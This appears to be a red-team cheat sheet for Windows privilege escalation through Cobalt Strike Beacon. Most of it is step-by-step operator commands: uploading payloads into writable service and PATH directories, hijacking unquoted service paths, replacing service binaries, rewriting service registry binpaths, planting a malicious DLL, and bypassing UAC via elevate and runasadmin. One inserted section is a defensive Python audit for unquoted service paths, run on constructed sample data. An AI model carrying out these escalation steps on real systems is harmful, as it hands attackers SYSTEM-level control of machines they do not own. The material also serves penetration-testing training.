# Privilege Escalation

***

## Check Permissions

```
cacls C:\Path\To\Check\
```

| Permission | Meaning                        |
| ---------- | ------------------------------ |
| F          | Full control                   |
| R          | Read & execute                 |
| C          | Read, write, execute, & delete |
| W          | Write                          |

***

## PATH Variable Hijacking

The `%PATH%` variable is constructed from two locations:

* **User** - `HKEY_CURRENT_USER\Environment` (user can modify)
* **Machine** - `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment` (admin only)

User processes use Machine + User paths. System processes use only Machine paths.

```
# Print the Beacon process environment, including the effective PATH
env
# Check the ACL of each PATH directory for write access by standard users
cacls C:\Python313\Scripts\
```

If a directory in PATH is writable by standard users, you can place a malicious executable there.

***

## Service Exploits

### Search Order Hijacking

Place the malicious executable where the service will find it before the legitimate one.

```
# Check permissions
cacls "C:\Program Files\Bad Windows Service\Service Executable"
# Output: NT AUTHORITY\Authenticated Users:(CI)(OI)F

# Upload payload
cd "C:\Program Files\Bad Windows Service\Service Executable"
upload C:\Payloads\dns_x64.exe
mv dns_x64.exe cmd.exe
```

### Unquoted Service Paths

Exploit unquoted service binary paths that contain spaces: Windows tries each space-delimited prefix (plus `.exe`) before reaching the real executable.

```
# Enumerate services
sc_enum

# Check permissions on parent directory
cacls "C:\Program Files\Bad Windows Service"
# Output: NT AUTHORITY\Authenticated Users:(CI)(OI)F

# Upload payload with name that matches path parsing
cd "C:\Program Files\Bad Windows Service"
upload C:\Payloads\dns_x64.svc.exe
mv dns_x64.svc.exe Service.exe
sc_stop BadWindowsService
sc_start BadWindowsService
```

> If you cannot start/stop the service, wait for reboot or trigger one.
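Defender-side audit for the unquoted-path case, added here and not part of the original page or of Cobalt Strike: given service `ImagePath` values (as `sc_qc` or the Services registry key report them) and the directories whose ACL grants low-privileged users write access (as `cacls` reports them), it lists the break points Windows would try before the real binary. All service names, paths and writable directories below are constructed samples.

```python
from __future__ import annotations
import ntpath

def unquoted_path_candidates(image_path: str) -> list[str]:
    """Binaries Windows tries, in order, before reaching the intended .exe of an
    unquoted ImagePath. Returns [] when the path is quoted or has no space before
    the executable name (spaces in the arguments after the .exe do not matter).
    Paths without a .exe suffix are reported conservatively: every prefix is listed."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return []
    tokens = image_path.split(" ")
    tried = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            break  # this is the real binary; everything after it is arguments
        tried.append(prefix + ".exe")
    return tried

def hijack_points(image_path: str, writable_dirs: set[str]) -> list[str]:
    """Candidates whose parent directory a low-privileged user can write to.
    These are the paths to quote (and the ACLs to tighten) in a hardening pass."""
    writable = {ntpath.normpath(d).lower() for d in writable_dirs}
    return [c for c in unquoted_path_candidates(image_path)
            if ntpath.normpath(ntpath.dirname(c)).lower() in writable]

def audit(services: dict[str, str], writable_dirs: set[str]) -> dict[str, list[str]]:
    """Map each exposed service name to its writable break points; clean services are omitted."""
    return {name: pts for name, path in services.items()
            if (pts := hijack_points(path, writable_dirs))}

# Constructed sample data (not from a real host): ImagePath values and the
# directories on which cacls showed Authenticated Users with write access.
SAMPLE_SERVICES = {
    "BadWindowsService": r"C:\Program Files\Bad Windows Service\Service Executable\BadWindowsService.exe",
    "GoodService": r'"C:\Program Files\Good Service\GoodService.exe" -config "C:\Program Files\Good Service\svc.cfg"',
    "Dhcp": r"C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted",
}
WRITABLE_DIRS = {r"C:\Program Files\Bad Windows Service", r"C:\Temp"}

if __name__ == "__main__":
    for name, pts in audit(SAMPLE_SERVICES, WRITABLE_DIRS).items():
        print(f"{name}: unquoted path with writable break point(s): {pts}")
```

Only `BadWindowsService` is reported, at `C:\Program Files\Bad Windows Service\Service.exe`, matching the break point the section above exploits; quoting the path or removing write access for Authenticated Users from that directory clears the finding.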

### Weak Service Binary Permissions

Replace the actual service executable.

```
# Check executable permissions
cacls "C:\Program Files\Bad Windows Service\Service Executable\BadWindowsService.exe"
# Output: NT AUTHORITY\Authenticated Users:F

# Replace executable
cd "C:\Program Files\Bad Windows Service\Service Executable\"
sc_stop BadWindowsService
upload C:\Payloads\BadWindowsService.exe
sc_start BadWindowsService
```

### Weak Service Registry Permissions

Modify service configuration via registry.

```
# Check registry permissions
powerpick Get-Acl -Path HKLM:\SYSTEM\CurrentControlSet\Services\BadWindowsService | fl

# Stop service and note current binpath
sc_stop BadWindowsService
sc_qc BadWindowsService

# Upload payload
cd C:\Temp
upload C:\Payloads\dns_x64.svc.exe

# Modify service config (binpath, type=0, start=2)
sc_config BadWindowsService C:\Temp\dns_x64.svc.exe 0 2
sc_start BadWindowsService

# Restore original binpath after exploitation
sc_config BadWindowsService "C:\Program Files\Bad Windows Service\Service Executable\BadWindowsService.exe" 0 2
```

***

## DLL Search Order Hijacking

Typical DLL search order:

1. The executing directory
2. The System32 directory
3. The 16-bit System directory
4. The Windows directory
5. The current working directory
6. Directories in PATH

```
# Check if service directory is writable
cacls "C:\Program Files\Bad Windows Service\Service Executable"
# Output: NT AUTHORITY\Authenticated Users:(CI)(OI)F

cd "C:\Program Files\Bad Windows Service\Service Executable"
upload C:\Payloads\dns_x64.dll
mv dns_x64.dll BadDll.dll
```

***

## UAC Bypass (Medium → High Integrity)

> **Prerequisite:** Must be member of local Administrators group

Check current integrity:

```
whoami
# Look at bottom of output for integrity level
```

### elevate Command

```
elevate [exploit] [listener]
```

| Exploit               | Description              |
| --------------------- | ------------------------ |
| svc-exe               | Get SYSTEM via service   |
| uac-schtasks          | Bypass via SilentCleanup |
| uac-token-duplication | Token duplication bypass |

### runasadmin Command

Execute arbitrary commands with elevation.

```
runasadmin [exploit] [command] [args]
```

| Exploit               | Description            |
| --------------------- | ---------------------- |
| uac-cmstplua          | CMSTPLUA COM interface |
| uac-eventvwr          | eventvwr.exe bypass    |
| uac-schtasks          | SilentCleanup bypass   |
| uac-token-duplication | Token duplication      |
| uac-wscript           | wscript.exe bypass     |

### CMSTPLUA UAC Bypass

> **Requirement:** Beacon process must be in `C:\Windows\*`

1. Spawn a new Beacon:

   ```
   spawn x64 http
   ```
2. Generate PowerShell one-liner:
   * Right-click Beacon → **Access > One-liner**
   * Select tcp-local listener
3. Execute bypass:

   ```
   runasadmin uac-cmstplua [ONE-LINER]
   connect localhost 1337
   ```

***

## Quick Reference

| Vulnerability       | Detection                        | Exploitation            |
| ------------------- | -------------------------------- | ----------------------- |
| PATH Hijack         | Writable dir in PATH             | Place malicious EXE     |
| Search Order Hijack | Writable service directory       | Place malicious DLL/EXE |
| Unquoted Path       | Space in unquoted service path   | Place EXE at path break |
| Weak Binary         | Writable service executable      | Replace EXE             |
| Weak Registry       | Writable service registry key    | Modify ImagePath        |
| DLL Hijack          | Writable dir in DLL search order | Place malicious DLL     |
| UAC Bypass          | Medium integrity + local admin   | elevate/runasadmin      |
